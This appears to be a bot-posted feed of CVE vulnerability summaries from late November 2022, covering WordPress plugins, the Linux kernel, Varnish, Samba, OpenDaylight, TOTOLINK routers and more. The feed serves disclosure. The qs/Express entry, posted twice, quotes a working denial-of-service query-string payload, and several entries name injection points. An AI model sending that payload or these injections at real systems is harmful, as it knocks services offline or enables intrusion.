| 2022-11-28 17:02:10 |
🚨 CVE-2021-25059The Download Plugin WordPress plugin before 2.0.0 does not properly validate a user has the required privileges to access a backup's nonce identifier, which may allow any users with an account on the site (such as subscriber) to download a full copy of the website.🎖@cveNotify |
|
| 2022-11-28 17:02:09 |
🚨 CVE-2022-3490The Checkout Field Editor (Checkout Manager) for WooCommerce WordPress plugin before 1.8.0 unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present🎖@cveNotify |
|
| 2022-11-28 17:02:08 |
🚨 CVE-2022-3603The Export customers list csv for WooCommerce, WordPress users csv, export Guest customer list WordPress plugin before 2.0.69 does not validate data when outputting it back in a CSV file, which could lead to CSV injection.🎖@cveNotify |
|
| 2022-11-28 17:02:04 |
🚨 CVE-2022-3822The Donations via PayPal WordPress plugin before 1.9.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2022-11-28 17:02:03 |
🚨 CVE-2022-40303An issue was discovered in libxml2 before 2.10.3. When parsing a multi-gigabyte XML document with the XML_PARSE_HUGE parser option enabled, several integer counters can overflow. This results in an attempt to access an array at a negative 2GB offset, typically leading to a segmentation fault.🎖@cveNotify |
|
| 2022-11-28 17:02:02 |
🚨 CVE-2022-41937XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. The application allows anyone with view access to modify any page of the wiki by importing a crafted XAR package. The problem has been patched in XWiki 14.6RC1, 14.6 and 13.10.8. As a workaround, setting the right of the page Filter.WebHome and making sure only the main wiki administrators can view the application installed on main wiki or edit the page and apply the changed described in commit fb49b4f.🎖@cveNotify |
|
| 2022-11-28 14:01:54 |
🚨 CVE-2022-43588A null pointer dereference vulnerability exists in the handle_ioctl_83150 functionality of Callback technologies CBFS Filter 20.0.8317. A specially-crafted I/O request packet (IRP) can lead to denial of service. An attacker can issue an ioctl to trigger this vulnerability.🎖@cveNotify |
|
| 2022-11-28 14:01:53 |
🚨 CVE-2022-43590A null pointer dereference vulnerability exists in the handle_ioctl_0x830a0_systembuffer functionality of Callback technologies CBFS Filter 20.0.8317. A specially-crafted I/O request packet (IRP) can lead to denial of service. An attacker can issue an ioctl to trigger this vulnerability.🎖@cveNotify |
|
| 2022-11-28 13:01:54 |
🚨 CVE-2022-45939GNU Emacs through 28.2 allows attackers to execute commands via shell metacharacters in the name of a source-code file, because lib-src/etags.c uses the system C library function in its implementation of the ctags program. For example, a victim may use the "ctags *" command (suggested in the ctags documentation) in a situation where the current working directory has contents that depend on untrusted input.🎖@cveNotify |
|
| 2022-11-28 07:01:57 |
🚨 CVE-2022-42896There are use-after-free vulnerabilities in the Linux kernel's net/bluetooth/l2cap_core.c's l2cap_connect and l2cap_le_connect_req functions which may allow code execution and leaking kernel memory (respectively) remotely via Bluetooth. A remote attacker could execute code leaking kernel memory via Bluetooth if within proximity of the victim. We recommend upgrading past commit https://www.google.com/url https://github.com/torvalds/linux/commit/711f8c3fb3db61897080468586b970c87c61d9e4 https://www.google.com/url🎖@cveNotify |
|
| 2022-11-28 07:01:56 |
🚨 CVE-2022-42895There is an infoleak vulnerability in the Linux kernel's net/bluetooth/l2cap_core.c's l2cap_parse_conf_req function which can be used to leak kernel pointers remotely. We recommend upgrading past commit https://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e https://www.google.com/url🎖@cveNotify |
|
| 2022-11-28 07:01:55 |
🚨 CVE-2022-45060An HTTP Request Forgery issue was discovered in Varnish Cache 5.x and 6.x before 6.0.11, 7.x before 7.1.2, and 7.2.x before 7.2.1. An attacker may introduce characters through HTTP/2 pseudo-headers that are invalid in the context of an HTTP/1 request line, causing the Varnish server to produce invalid HTTP/1 requests to the backend. This could, in turn, be used to exploit vulnerabilities in a server behind the Varnish server. Note: the 6.0.x LTS series (before 6.0.11) is affected.🎖@cveNotify |
|
| 2022-11-28 07:01:54 |
🚨 CVE-2020-11653An issue was discovered in Varnish Cache before 6.0.6 LTS, 6.1.x and 6.2.x before 6.2.3, and 6.3.x before 6.3.2. It occurs when communication with a TLS termination proxy uses PROXY version 2. There can be an assertion failure and daemon restart, which causes a performance loss.🎖@cveNotify |
|
| 2022-11-28 00:01:57 |
🚨 CVE-2022-42004In FasterXML jackson-databind before 2.13.4, resource exhaustion can occur because of a lack of a check in BeanDeserializer._deserializeFromArray to prevent use of deeply nested arrays. An application is vulnerable only with certain customized choices for deserialization.🎖@cveNotify |
|
| 2022-11-28 00:01:56 |
🚨 CVE-2022-42003In FasterXML jackson-databind before 2.14.0-rc1, resource exhaustion can occur because of a lack of a check in primitive value deserializers to avoid deep wrapper array nesting, when the UNWRAP_SINGLE_VALUE_ARRAYS feature is enabled. Additional fix version in 2.13.4.1 and 2.12.17.1🎖@cveNotify |
|
| 2022-11-28 00:01:55 |
🚨 CVE-2020-36518jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects.🎖@cveNotify |
|
| 2022-11-27 07:05:56 |
🚨 CVE-2022-36111immudb is a database with built-in cryptographic proof and verification. In versions prior to 1.4.1, a malicious immudb server can provide a falsified proof that will be accepted by the client SDK signing a falsified transaction replacing the genuine one. This situation can not be triggered by a genuine immudb server and requires the client to perform a specific list of verified operations resulting in acceptance of an invalid state value. This vulnerability only affects immudb client SDKs, the immudb server itself is not affected by this vulnerability. This issue has been patched in version 1.4.1.🎖@cveNotify |
|
| 2022-11-27 07:05:54 |
🚨 CVE-2022-34830An Arm product family through 2022-06-29 has a TOCTOU Race Condition that allows non-privileged user to make improper GPU processing operations to gain access to already freed memory.🎖@cveNotify |
|
| 2022-11-27 07:05:53 |
🚨 CVE-2022-37772Maarch RM 2.8.3 solution contains an improper restriction of excessive authentication attempts due to excessive verbose responses from the application. An unauthenticated remote attacker could potentially exploit this vulnerability, leading to compromised accounts.🎖@cveNotify |
|
| 2022-11-27 07:05:51 |
🚨 CVE-2022-45914The ESL (Electronic Shelf Label) protocol, as implemented by (for example) the OV80e934802 RF transceiver on the ETAG-2130-V4.3 20190629 board, does not use authentication, which allows attackers to change label values via 433 MHz RF signals, as demonstrated by disrupting the organization of a hospital storage unit, or changing retail pricing.🎖@cveNotify |
|
| 2022-11-27 07:05:50 |
🚨 CVE-2022-45919An issue was discovered in the Linux kernel through 6.0.10. In drivers/media/dvb-core/dvb_ca_en50221.c, a use-after-free can occur is there is a disconnect after an open, because of the lack of a wait_event.🎖@cveNotify |
|
| 2022-11-27 07:05:49 |
🚨 CVE-2022-45930A SQL injection issue was discovered in AAA in OpenDaylight (ODL) before 0.16.5. The aaa-idm-store-h2/src/main/java/org/opendaylight/aaa/datastore/h2/DomainStore.java deleteDomain function is affected for the /auth/v1/domains/ API interface.🎖@cveNotify |
|
| 2022-11-27 07:05:47 |
🚨 CVE-2022-45931A SQL injection issue was discovered in AAA in OpenDaylight (ODL) before 0.16.5. The aaa-idm-store-h2/src/main/java/org/opendaylight/aaa/datastore/h2/UserStore.java deleteUser function is affected when the API interface /auth/v1/users/ is used.🎖@cveNotify |
|
| 2022-11-27 07:05:46 |
🚨 CVE-2022-45932A SQL injection issue was discovered in AAA in OpenDaylight (ODL) before 0.16.5. The aaa-idm-store-h2/src/main/java/org/opendaylight/aaa/datastore/h2/RoleStore.java deleteRole function is affected when the API interface /auth/v1/roles/ is used.🎖@cveNotify |
|
| 2022-11-27 07:05:44 |
🚨 CVE-2022-45933KubeView through 0.1.31 allows attackers to obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication, and retrieves certificate files that can be used for authentication as kube-admin. NOTE: the vendor's position is that KubeView was a "fun side project and a learning exercise," and not "very secure."🎖@cveNotify |
|
| 2022-11-27 07:05:42 |
🚨 CVE-2022-43705In Botan before 2.19.3, it is possible to forge OCSP responses due to a certificate verification error. This issue was introduced in Botan 1.11.34 (November 2016).🎖@cveNotify |
|
| 2022-11-27 07:05:40 |
🚨 CVE-2022-45934An issue was discovered in the Linux kernel through 6.0.10. l2cap_config_req in net/bluetooth/l2cap_core.c has an integer wraparound via L2CAP_CONF_REQ packets.🎖@cveNotify |
|
| 2022-11-27 07:05:39 |
🚨 CVE-2022-24999qs before 6.10.3, as used in Express before 4.17.3 and other products, allows attackers to cause a Node process hang for an Express application because an __ proto__ key can be used. In many typical Express use cases, an unauthenticated remote attacker can place the attack payload in the query string of the URL that is used to visit the application, such as a[__proto__]=b&a[__proto__]&a[length]=100000000. The fix was backported to qs 6.9.7, 6.8.3, 6.7.3, 6.6.1, 6.5.3, 6.4.1, 6.3.3, and 6.2.4 (and therefore Express 4.17.3, which has "deps: qs@6.9.7" in its release description, is not vulnerable).🎖@cveNotify |
|
| 2022-11-27 07:05:38 |
🚨 CVE-2022-45909drachtio-server 0.8.18 has a heap-based buffer over-read via a long Request-URI in an INVITE request.🎖@cveNotify |
|
| 2022-11-27 07:05:37 |
🚨 CVE-2022-38166In F-Secure Endpoint Protection for Windows and macOS before channel with Capricorn database 2022-11-22_07, the aerdl.dll unpacker handler crashes. This can lead to a scanning engine crash, triggerable remotely by an attacker for denial of service.🎖@cveNotify |
|
| 2022-11-27 02:05:37 |
🚨 CVE-2022-41916Heimdal is an implementation of ASN.1/DER, PKIX, and Kerberos. Versions prior to 7.7.1 are vulnerable to a denial of service vulnerability in Heimdal's PKI certificate validation library, affecting the KDC (via PKINIT) and kinit (via PKINIT), as well as any third-party applications using Heimdal's libhx509. Users should upgrade to Heimdal 7.7.1 or 7.8. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2022-11-27 02:05:36 |
🚨 CVE-2021-3671A null pointer de-reference was found in the way samba kerberos server handled missing sname in TGS-REQ (Ticket Granting Server - Request). An authenticated user could use this flaw to crash the samba server.🎖@cveNotify |
|
| 2022-11-27 02:05:35 |
🚨 CVE-2019-14870All Samba versions 4.x.x before 4.9.17, 4.10.x before 4.10.11 and 4.11.x before 4.11.3 have an issue, where the S4U (MS-SFU) Kerberos delegation model includes a feature allowing for a subset of clients to be opted out of constrained delegation in any way, either S4U2Self or regular Kerberos authentication, by forcing all tickets for these clients to be non-forwardable. In AD this is implemented by a user attribute delegation_not_allowed (aka not-delegated), which translates to disallow-forwardable. However the Samba AD DC does not do that for S4U2Self and does set the forwardable flag even if the impersonated client has the not-delegated flag set.🎖@cveNotify |
|
| 2022-11-27 01:05:35 |
🚨 CVE-2022-24999qs before 6.10.3, as used in Express before 4.17.3 and other products, allows attackers to cause a Node process hang for an Express application because an __ proto__ key can be used. In many typical Express use cases, an unauthenticated remote attacker can place the attack payload in the query string of the URL that is used to visit the application, such as a[__proto__]=b&a[__proto__]&a[length]=100000000. The fix was backported to qs 6.9.7, 6.8.3, 6.7.3, 6.6.1, 6.5.3, 6.4.1, 6.3.3, and 6.2.4 (and therefore Express 4.17.3, which has "deps: qs@6.9.7" in its release description, is not vulnerable).🎖@cveNotify |
|
| 2022-11-26 08:05:56 |
🚨 CVE-2022-44251TOTOLINK NR1800X V9.1.0u.6279_B20210910 contains a command injection via the ussd parameter in the setUssd function.🎖@cveNotify |
|
| 2022-11-26 08:05:55 |
🚨 CVE-2022-44252TOTOLINK NR1800X V9.1.0u.6279_B20210910 contains a command injection via the FileName parameter in the setUploadSetting function.🎖@cveNotify |
|